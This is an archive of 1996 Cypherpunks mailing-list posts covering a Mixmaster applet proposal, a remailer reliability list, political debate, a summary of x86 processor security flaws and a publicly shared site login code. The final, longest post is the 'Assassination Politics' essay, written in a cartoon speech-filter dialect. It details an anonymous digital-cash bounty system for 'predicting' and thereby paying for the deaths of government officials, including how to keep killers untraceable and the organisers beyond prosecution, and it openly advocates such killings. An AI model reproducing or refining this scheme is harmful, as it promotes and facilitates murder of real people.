people who have reason or the inclination to careful can avoid these
pitfalls and communicate with more security than more casual users. 

The things that make PGP worth using are (a) even casual users get a lot
more security than they would have without PGP, and (b) it's possible to
get just about as much security as is possible with anything if you use
PGP properly. 

The point is that a java applet that implements a mixmaster client might
not be nearly as secure as the unix C version, but if one existed it would
still (right now, at least) be the best way to send anonymous mail for a
comparatively naive user.  It would fit into a larger mixmaster system
that provides more security for people who are willing and able to invest
the effort it takes to run the unix version.

And better yet, shouldn't it be possible to set things up so that almost
all of the code in a crypto applet could be reused in a crypto application
that's more secure?  

Most crpto programs will need entropy, and that's hard to come by in a
java applet;  a java application should have an easier time of it.  Why
not write two versions of an entropy generator, one for applets, and one
for applications, so that someone who writes a mixmaster applet can get a
better mixmaster application for just a little more work?  

Isn't this sort of code reusability supposed to be what OOP is all about? 
Couldn't Hal's list of applet problems serve as the basis of two packages,
one for applets, and another for applications?  Each problem would have a
method associated with it in each version of the package.  Maybe the
applet package would have a routine to write a file, encrypted with a
passphrase, on a central server.  The same routine in the application
package would write the file, encrypted with a passphrase, to a local
disk.

Ideally, we'd have a mixmaster applet, with an explanation on the same
page that says the stand alone application would be more secure, and a
link to download it.

Does this make sense?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 30 Apr 1996 10:03:08 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199604291401.HAA19162@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@gate.net> mix cpunk latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 29 Apr 96 6:49:00 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
exon     remailer@remailer.nl.com         ****#**##***     1:45 100.00%
alpha    alias@alpha.c2.org               +-*+++*+-+++    40:43  99.98%
hacktic  remailer@utopia.hacktic.nl       ***++**+****     8:30  99.94%
replay   remailer@replay.com              ************     5:19  99.83%
portal   hfinney@shell.portal.com          *###  #####      :47  99.67%
lead     mix@zifi.genetics.utah.edu       ++++++++++++    42:25  99.66%
c2       remail@c2.org                    +-***+*+++++    36:32  99.61%
penet    anon@anon.penet.fi               __--_-__..   42:42:24  99.51%
extropia remail@miron.vip.best.com        ----.------   7:35:32  99.50%
flame    remailer@flame.alias.net         --------+++   3:30:28  99.17%
ecafe    cpunk@remail.ecafe.org           -#*+++-  #*     39:04  99.04%
mix      mixmaster@remail.obscura.com     ____.+___.   41:32:58  98.77%
shinobi  remailer@shinobi.alias.net       +*--****-*-   1:47:17  97.87%
haystack haystack@holy.cow.net            #*#++## #+*      2:59  97.64%
alumni   hal@alumni.caltech.edu            *###+#+*##      2:01  94.64%
vegas    remailer@vegas.gateway.com       + __.-##- .- 15:19:58  91.82%
amnesia  amnesia@chardos.connix.com       ---------     2:59:30  70.08%
treehole remailer@mockingbird.alias.net   -.--+++    +  5:07:02  59.68%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Tue, 30 Apr 1996 10:13:22 +0800
To: cypherpunks@toad.com
Subject: Re: code vs cypher
In-Reply-To: <199604290602.XAA02064@dns2.noc.best.net>
Message-ID: <3184D638.188C00D4@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@echeque.com wrote:
> 
> At 10:01 PM 4/28/96 -0700, Rich Graves wrote:
> > I do not recall defending any statist policies. I did not defend the
> > [SMC call to silence Nazis], and indeed to defend the
> > [SMC ] would not have been
> > egregious statism, or indeed any kind of statism at all,
> 
> I do not recall anyone accusing you of statism on the SMC call to cut
> Nazi net access -- probably because I deleted all that tedious crap,
> not because nobody accused you.

[blah blah blah deleted]

   I just wanted to point out that, for those who had any remaining
doubt, the evolution of this thread demonstrates quite well the need for
a separate coderpunks list.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 30 Apr 1996 08:04:21 +0800
To: "CyberAngels Director : Colin Gabriel Hatcher" <angels@wavenet.com>
Subject: Re: Freedom and security
In-Reply-To: <v01510107a9e4964f3008@[198.147.118.206]>
Message-ID: <3184BA68.1AEC@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


CyberAngels Director : Colin Gabriel Hatcher wrote:

> The relationship / balance between security and freedom is always a
> defining factor in a society.  My point is that a society with no laws and
> no codes of conduct is not a free society. 

You have your definition of "free", and others have theirs.


> My position is to seek a balance between the freedom of the individual and
> the security of the community.  My argument is that when the security of
> the community is threatened by the freedom of the individual, the community
> will always prioritise its safety.  Good government of course means
> maintaining individual freedoms *and* maintaining community security.  I
> actually disagree that they are antithetical.  On the contrary they are a
> balance that any society has to find. 

If they weren't antithetical, there'd be no need for a balance. 

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 30 Apr 1996 09:44:27 +0800
To: bryce@digicash.com
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <199604291026.MAA09328@digicash.com>
Message-ID: <Pine.SUN.3.91.960429074505.26735A-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 29 Apr 1996 bryce@digicash.com wrote:

> Actually, Black Uni's key via finger has two signatures (not
> counting his own): Sandy Sandfort (whose key has no 
> signatures, as far as my copy of it goes),

I had only one signature on my key.  It was Phil Zimmermann's, 
but it's one he has since revoked. 


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 30 Apr 1996 07:00:59 +0800
To: cypherpunks@toad.com
Subject: BOW_itz
Message-ID: <199604291242.IAA05717@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


4-29-96 WSJ has page one leader on the December federal bust of 
Bernard Oskar Bowitz, an EE peddling gear for cellular piracy. 
It lays out the cyber-tracking and -trapping.


"This case offers a glimpse into the crime in the 21st 
century," scowls a US Attorney.


Bowitz derises, "I'm very flattered to hear they think I'm a 
mastermind. I think they're watching too many Arnold 
Schwarzenegger movies."


BOW_itz (but see below)


-----


WSJ opens a pay-for-it Web site today: www.wsj.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 30 Apr 1996 09:11:16 +0800
To: cypherpunks@toad.com
Subject: Re: Former CIA Director and *Strategic Investment* Editor missing
Message-ID: <m0uDvBL-00097LC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:06 AM 4/29/96 -0700, anonymous-remailer@shell.portal.com wrote:
>CNN is reporting that Colby's canoe has been found on the Potomac and
>Colby is missing.


Don't tell me, let me guess:  The guy who rented the canoe to him has 
suddenly retired, and has been reportedly seen going on a Park Avenue 
shopping spree.  Right?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 30 Apr 1996 12:16:01 +0800
To: Snow <snow@crash.suba.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <m0uDvRU-00092AC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:32 AM 4/29/96 -0500, Snow wrote:
>On Sun, 28 Apr 1996, jim bell wrote:
 
>> Quite the contrary, I think that a "successful popular uprising" will 
>> require only a very small investment in time and money, in which some of 
>> they key players in government are targeted and the prospect exists for 
>> easily and cheaply getting the rest.  At that point they will resign in droves.
>
>	Damnit, I KNEW I was gonna wind up agreeing with him. ;)

Hey, maybe it's just a fever.  Take a few aspirin, put a cold compress on your head, and lay down.

>> avoid taxation, the vast increase in information communicated by the 
>> Internet is taking a huge amount of power away from the traditional media, 
>> backer of the government in most cases.  In addition, this information flow 
>> is making it ever more difficult to pass abusive laws; if the government 
>
>	On the contrary, just as the increased communications let 
>opponents know about the legislation, it also lets the proponents know, 
>and they supposedly send faxes and email in support. 

This sometimes happens; however, on many of the issues dearest to CP readers (Clipper, etc) there really is no substantial opposition except among those in government.

>> does something stupid in the morning, by noon they are being flooded with 
>> faxes and emails.  And the whole concept of having a "governement" tends to 
>> be based on the assumption that people are incapable of making decisions for 
>> themselves.  That's an increasingly unrealistic position.
>
>	Literacy rates are dropping, the High School Dropout rates are on 
>the rise. Hell, listen to talk radio for a while, and you tell me if 
>these are the people YOU want running the country.

I think there's a problem embedded in your comment.  You mentioned "running 
the country."  That phrase contains within it a view of "the country" in 
which it is controlled by a central control mechanism, for example a 
government.  

To describe the alternative viewpoint, consider the analogy of the food 
distribution system of Manhattan island.  No one individual or group 
controls everything; they all operate separately and with little overall 
communication.  Yet the steaks are served at the best restaurants, the 
grocery stores are stocked with the food people want, etc.  No heirarchical 
government, yet the system works!  

If you ask me if I want uneducated people running the "food distribution 
system," I might be inclined to say no, but if you ask me whether they can 
work as checkers at the local grocery store, I'd say "yes."

Likewise, if you ask me if I want uneducated people "running the country" I 
guess I have no problem with them controlling their proportional amount of 
political influence (BTW, they do this already!) but no more.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 29 Apr 1996 21:17:13 +0800
To: cypherpunks@toad.com
Subject: Get your I/CODE today
Message-ID: <199604290708.JAA14522@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


	I just created a "cypherpunk" identity on I/PRO. Too bad they
don't let you choose a nice string like "cypherpunk" to login with.

The cypherpunks I/PRO code is:
adct0524

	
	(I told them that we live in Djibouti)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 30 Apr 1996 01:13:31 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: code vs. cypher
Message-ID: <199604290910.CAA20783@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from Rich Graves <llurch@networking.stanford.edu> 04/28/96 01:41am -0700

= Admitting that you pray -- now, that takes courage, well, in polite 
= circles in California it does. 

	aahh, but I live in rural Utah where the closest large city has a population of less 
    than 25,000!



--
"When you know everything I do - and you will - you will never think  
 of the American government in the same way again." 
        -- Tim McVeigh's defense attorney, Stephen Jones 



cc: Cypherpunks <cypherpunks@toad.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Mon, 29 Apr 1996 22:21:58 +0800
To: cypherpunks@toad.com
Subject: Re: trusting the processor chip
In-Reply-To: <Pine.LNX.3.91.960428150426.2054A-100000@crash.suba.com>
Message-ID: <199604290725.JAA08405@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



The promised reference:

"The Intel 80x86 Processor Architecture: 
Pitfalls for Secure Systems"

Olin Silbert, Oxford Systems Inc,
Phillip A Porras, The Aerospace Corp,
Robert Lindell, --- " ---

Abstract:
An in-depth analysis of the 80x86 processor families identifies
architectural properties that may have unexpected, and undesirable,
results in secure computer systems. In addition, reported
implementation errors in some processor versions render them 
undesirable for secure systems because of potential security and
reliability problems. In this paper, we discuss the imbalance in 
scrutiny for hardware protection mechanisms relative to software,
and why this imbalance is increasingly difficult to justify as
hardware complexity increases. We illustrate this difficulty with 
examples of architectural subtleties and reported implementation
errors.


My comments:
This is a high-security view paper, so they go on looking for
all possible covert channels etc. Not what we are discussing 
here, perhaps.

They note one problem with Page Access Control by the TCB through
the VERR and VERW instructions. In some cases it is possible
that these instructions leave "grant access" when they should have
said the opposite.

They note that the Timestamp Counter (TCS) in the pentium might
give out high-resolution timing information. This can be used 
attack sw RSA running in another task for example, I believe.

They have 102 flaw reports collected for 80386, 80486, Pentium.

There are 8 major security flaws reported. "7. The bits of the 
I/O Permission Bitmap (IOPB) correspond to individual byte addresses
in the I/O address space. The D0 step of the 386 permits
access to certain addresses prohibited by the I/O bitamap: if a 
4-byte access is performed, only 3 of the 4 relevant bytes are 
checked."

There were 9 denial-of-service as well, here's one "LAL, LSL, 
VERR, VERW for a null (zero) selector (A1 step) [Turl88]"

Quite fun reading, although I also recognizes that this kind of
attack is a bit down on the list of best cost/effort ratios.

-Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 30 Apr 1996 08:50:17 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199604290734.JAA15398@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Fm: E. Fudd <fudd@loony.org>


I've been fowwowing de concepts of digitaw cash and encwyption, since
I wead de awticwe in de August 1992 issue of Scientific Amewican on
"encwypted signatuwes."  Whiwe I've onwy fowwowed de Digitawibewty awea
fow a few weeks, I can awweady see a numbew of points dat do (and
shouwd!) stwongwy concewn de avewage savvy individuaw:

1.  How can we twanswate de fweedom affowded by de Intewnet to
owdinawy wife?

2.  How can we keep de govewnment fwom banning encwyption, digitaw
cash, and odew systems dat wiww impwove ouw fweedom?


A few monds ago, I had a twuwy and qwite witewawwy "wevowutionawy"
idea, and I jokingwy cawwed it "Assassination Powitics": I specuwated on
de qwestion of whedew an owganization couwd be set up to _wegawwy_
announce eidew dat it wouwd be awawding a cash pwize to somebody who
cowwectwy "pwedicted" de deaf of one of a wist of viowatows of
wights, usuawwy eidew govewnment empwoyees, officehowdews, ow
appointees.  It couwd ask fow anonymous contwibutions fwom de pubwic,
and individuaws wouwd be abwe send dose contwibutions using digitaw
cash.

I awso specuwated dat using modewn medods of pubwic-key encwyption and
anonymous "digitaw cash," it wouwd be possibwe to make such awawds in
such a way so dat nobody knows who is getting awawded de money, onwy
dat de awawd is being given, uh-hah-hah-hah.   Even de owganization 
itsewf wouwd have
no infowmation dat couwd hewp de audowities find de pewson
wesponsibwe fow de pwediction, wet awone de one who caused de deaf.

It was not my intention to pwovide such a "tough nut to cwack" by
awguing de genewaw case, cwaiming dat a pewson who hiwes a hitman is
not guiwty of muwdew undew wibewtawian pwincipwes.  Obviouswy, de
pwobwem wif de genewaw case is dat de victim may be totawwy innocent
undew wibewtawian pwincipwes, which wouwd make de kiwwing a cwime,
weading to de qwestion of whedew de pewson offewing de money was
himsewf guiwty.

On de contwawy; my specuwation assumed dat de "victim" is a
govewnment empwoyee, pwesumabwy one who is not mewewy taking a paycheck
of stowen tax dowwaws, but awso is guiwty of extwa viowations of wights
beyond dis. (Govewnment agents wesponsibwe fow de Wuby Widge incident
and Waco come to mind.)  In weceiving such money and in his vawious
acts, he viowates de "Non-aggwession Pwincipwe" (NAP) and dus,
pwesumabwy, any acts against him awe not de initiation of fowce undew
wibewtawian pwincipwes.

De owganization set up to manage such a system couwd, pwesumabwy, make
up a wist of peopwe who had sewiouswy viowated de NAP, but who wouwd
not see justice in ouw couwts due to de fact dat deiw actions wewe
done at de behest of de govewnment.  Associated wif each name wouwd
be a dowwaw figuwe, de totaw amount of money de owganization has
weceived as a contwibution, which is de amount dey wouwd give fow
cowwectwy "pwedicting" de pewson's deaf, pwesumabwy naming de exact
date.  "Guessews" wouwd fowmuwate deiw "guess" into a fiwe, encwypt it
wif de owganization's pubwic key, den twansmit it to de owganization,
possibwy using medods as untwaceabwe as putting a fwoppy disk in an
envewope and tossing it into a maiwbox, but mowe wikewy eidew a cascade
of encwypted anonymous wemaiwews, ow possibwy pubwic-access Intewnet
wocations, such as tewminaws at a wocaw wibwawy, etc.

In owdew to pwevent such a system fwom becoming simpwy a wandom unpaid
wottewy, in which peopwe can wandomwy guess a name and date (hoping dat
wightning wouwd stwike, as it occasionawwy does), it wouwd be necessawy
to detew such wandom guessing by weqwiwing de "guessews" to incwude
wif deiw "guess" encwypted and untwaceabwe "digitaw cash," in an
amount sufficientwy high to make wandom guessing impwacticaw.

Fow exampwe, if de tawget was, say, 50 yeaws owd and had a wife
expectancy of 30 yeaws, ow about 10,000 days, de amount of money
weqwiwed to wegistew a guess must be at weast 1/10,000d of de amount
of de awawd.  In pwactice, de amount weqwiwed shouwd be faw highew,
pewhaps as much as 1/1000 of de amount, since you can assume dat
anybody making a guess wouwd feew sufficientwy confident of dat guess
to wisk 1/1000d of his potentiaw wewawd.

De digitaw cash wouwd be pwaced inside de outew "encwyption envewope,"
and couwd be decwypted using de owganization's pubwic key.  De
pwediction itsewf (incwuding name and date) wouwd be itsewf in anodew
encwyption envewope inside de fiwst one, but it wouwd be encwypted
using a key dat is onwy known to de pwedictow himsewf.  In dis way,
de owganization couwd decwypt de outew envewope and find de digitaw
cash, but dey wouwd have no idea what is being pwedicted in de
innewmost envewope, eidew de name ow de date.

If, watew, de "pwediction" came twue, de pwedictow wouwd pwesumabwy
send yet anodew encwypted "envewope" to de owganization, containing
de decwyption key fow de pwevious "pwediction" envewope, pwus a pubwic
key (despite its name, to be used onwy once!) to be used fow encwyption
of digitaw cash used as payment fow de awawd. De owganization wouwd
appwy de decwyption key to de pwediction envewope, discovew dat it
wowks, den notice dat de pwediction incwuded was fuwfiwwed on de
date stated.   De pwedictow wouwd be, dewefowe, entitwed to de awawd.
Nevewdewess, even den nobody wouwd actuawwy know WHO he is!

It doesn't even know if de pwedictow had anyding to do wif de
outcome of de pwediction, uh-hah-hah-hah.  If it weceived dese fiwes in 
de maiw, in
physicaw envewopes which had no wetuwn addwess, it wouwd have buwned de
envewopes befowe it studied deiw contents.  De wesuwt is dat even de
active coopewation of de owganization couwd not possibwy hewp anyone,
incwuding de powice, to wocate de pwedictow.)

Awso incwuded widin dis "pwediction-fuwfiwwed" encwyption envewope
wouwd be unsigned (not-yet-vawid) "digitaw cash," which wouwd den be
bwindwy signed by de owganization's bank and subseqwentwy encwypted
using de pubwic key incwuded. (De pubwic key couwd awso be pubwicized,
to awwow membews of de pubwic to secuwewy send deiw comments and,
possibwy, fuwdew gwatefuw wemunewation to de pwedictow, secuwewy.)
De wesuwting encwypted fiwe couwd be pubwished openwy on de Intewnet,
and it couwd den be decwypted by onwy one entity:  De pewson who had
made dat owiginaw, accuwate pwediction, uh-hah-hah-hah.  De wesuwt is 
dat de
wecipient wouwd be absowutewy untwaceabwe.

De digitaw cash is den pwocessed by de wecipient by "unbwinding" it,
a pwincipwe which is expwained in faw gweatew detaiw by an awticwe in
de August 1992 issue of Scientific Amewican, uh-hah-hah-hah.  De 
wesuwting digitaw
cash is absowutewy untwaceabwe to its souwce.

Dis ovewaww system achieves a numbew of goaws.  Fiwst, it totawwy hides
de identity of de pwedictow to de owganization, which makes it
unnecessawy fow any potentiaw pwedictow to "twust" dem to not weveaw
his name ow wocation, uh-hah-hah-hah.  Secondwy, it awwows de pwedictow 
to make his
pwediction widout weveawing de actuaw contents of dat pwediction
untiw watew, when he chooses to, assuwing him dat his "tawget" cannot
possibwy get eawwy wawning of his intent.   (and "faiwed" pwedictions
need nevew be weveawed).  In fact, he needs nevew weveaw his pwediction
unwess he wants de awawd. Diwd, it awwows de pwedictow to anonymouswy
gwant his awawd to anyone ewse he chooses, since he may give dis
digitaw cash to anyone widout feaw dat it wiww be twaced.

Fow de owganization, dis system awso pwovides a numbew of advantages.
By hiding de identity of de pwedictow fwom even it, de owganization
cannot be fowced to weveaw it, in eidew civiw ow cwiminaw couwt.  Dis
shouwd awso shiewd de owganization fwom wiabiwity, since it wiww not
know de contents of any "pwediction" untiw aftew it came twue.  (Even
so, de owganization wouwd be dewibewatewy kept "poow" so dat it wouwd
be judgment-pwoof.)  Since pwesumabwy most of de waws de owganization
might be accused of viowating wouwd weqwiwe dat de viowatow have
specific ow pwiow knowwedge, keeping itsewf ignowant of as many facts as
possibwe, fow as wong as possibwe, wouwd pwesumabwy make it vewy
difficuwt to pwosecute.

[end pawt 1]

[pawt 2]

"At de Viwwage Pizza shop, as dey wewe sitting down to consume a
peppewoni, Dowody asked Jim, 'So what odew inventions awe you wowking
on?"  Jim wepwied, 'I've got a new idea, but it's weawwy wevowutionawy.
Witewawwy WEVOWUTIONAWY.'   'Okay, Jim, which govewnment awe you
pwanning to ovewdwow?,' she asked, pwaying awong.
'Aww of dem,' answewed Jim."

Powiticaw Impwications
Imagine fow a moment dat as owdinawy citizens wewe watching de
evening news, dey see an act by a govewnment empwoyee ow  officehowdew
dat dey feew viowates deiw wights, abuses de pubwic's twust, ow
misuses de powews dat dey feew shouwd be wimited.  A pewson whose
actions awe so abusive ow impwopew dat de citizenwy shouwdn't have to
towewate it.

What if dey couwd go to deiw computews, type in de miscweant's name,
and sewect a dowwaw amount:  De amount dey, demsewves, wouwd be
wiwwing to pay to anyone who "pwedicts" dat officehowdew's deaf.  Dat
donation wouwd be sent, encwypted and anonymouswy, to a centwaw
wegistwy owganization, and be totawed, wif de totaw amount avaiwabwe
widin seconds to  any intewested individuaw.  If onwy 0.1% of de
popuwation, ow one pewson in a dousand, was wiwwing to pay $1 to see
some govewnment swimebaww dead, dat wouwd be, in effect, a $250,000
bounty on his head.

Fuwdew, imagine dat anyone considewing cowwecting dat bounty couwd do
so wif de madematicaw cewtainty dat he can't possibwy be identified,
and couwd cowwect de wewawd widout meeting, ow even tawking to,
anybody who couwd watew identify him.  Pewfect anonymity, pewfect
secwecy, and pewfect secuwity.  And dat, combined wif de ease and
secuwity wif which dese contwibutions couwd be cowwected, wouwd make
being an abusive govewnment empwoyee an extwemewy wisky pwoposition, uh-
hah-hah-hah.
Chances awe good dat nobody above de wevew of county commissionew
wouwd even wisk staying in office.

Just how wouwd dis change powitics in Amewica?  It wouwd take faw wess
time to answew, "What wouwd wemain de same?"  No wongew wouwd we be
ewecting peopwe who wiww tuwn awound and  tax us to deaf, weguwate us
to  deaf, ow fow dat mattew sent hiwed dugs to kiww us when we oppose
deiw wishes.

No miwitawy?

One of de attwactive potentiaw impwications of such a system wouwd be
dat we might not even need a miwitawy to pwotect de countwy.  Any
dweatening ow abusive foweign weadew wouwd be subject to de same
contwibution/assassination/wewawd system, and it wouwd opewate just as
effectivewy ovew bowdews as it does domesticawwy.

Dis countwy has weawned, in numewous exampwes subseqwent to many waws,
dat once de powiticaw disputes between weadews has ceased, we
(owdinawy citizens) awe abwe to get awong pwetty weww wif de citizens
of odew countwies.  Cwassic exampwes awe post-WWII Gewmany, Japan, and
Itawy, and post-Soviet Wussia, de Eastewn bwoc, Awbania, and many
odews.

Contwawy exampwes awe dose in which de powiticaw dispute wemains, such
as Nowf Kowea, Vietnam, Iwaq, Cuba, Wed China, and a few odews.  In
aww of dese exampwes, de opposing weadewship was NOT defeated, eidew
in waw ow in an intewnaw powew stwuggwe. Cweawwy, it is not de PEOPWE
who maintain de dispute, but de weadewship.

Considew how histowy might have changed if we'd been abwe to "bump off"
Wenin, Stawin, Hitwew, Mussowini, Tojo,  Kim Iw Sung, Ho Chi Minh,
Ayatowwah Khomeini, Saddam Hussein, Moammaw Khadafi, and vawious odews,
awong wif aww of deiw wepwacements if necessawy, aww fow a measwy few
miwwion dowwaws, wadew dan de biwwions of dowwaws and miwwions of
wives dat subseqwent waws cost.

But dat waises an intewesting qwestion, wif an even mowe intewesting
answew.  "If aww dis is so easy, why hasn't dis been done befowe?"   I
mean, waws awe destwuctive, costwy, and dangewous, so why hasn't some
smawt powitician figuwed out dat instead of fighting de entiwe
countwy, we couwd just 'zewo' de few bad guys on de top?

De answew is qwite weveawing, and stwikingwy "wogicaw":  If we can kiww
DEIW weadews, dey can kiww OUW weadews too.   Dat wouwd avoid de
waw, but de weadewship on bof sides wouwd be dead, and guess who is
making de decisions about what to do?  Dat's wight, de WEADEWS!

And de weadews (bof deiws and ouws!) wouwd wadew see 30,000,000
owdinawy peopwe die in WWII dan wose deiw own wives, if dey can get
away wif it.   Same in Kowea, Vietnam, Guwf Waw, and numewous odew
disputes awound de gwobe.  You can see dat as wong as we continue to
awwow weadews, bof "ouws" and "deiws," to decide who shouwd die, dey
wiww AWWAYS choose de owdinawy peopwe of each countwy.

One weason de weadews have been abwe to avoid dis sowution is simpwe:
Whiwe it's compawativewy easy to "get away wif muwdew," it's a wot
hawdew to wewawd de pewson who does it, and dat pewson is definitewy
taking a sewious wisk.   (Most muwdews awe sowved based on some pwiow
wewationship between de muwdew and victim, ow obsewvations of witnesses
who know eidew de muwdewew ow de victim.)

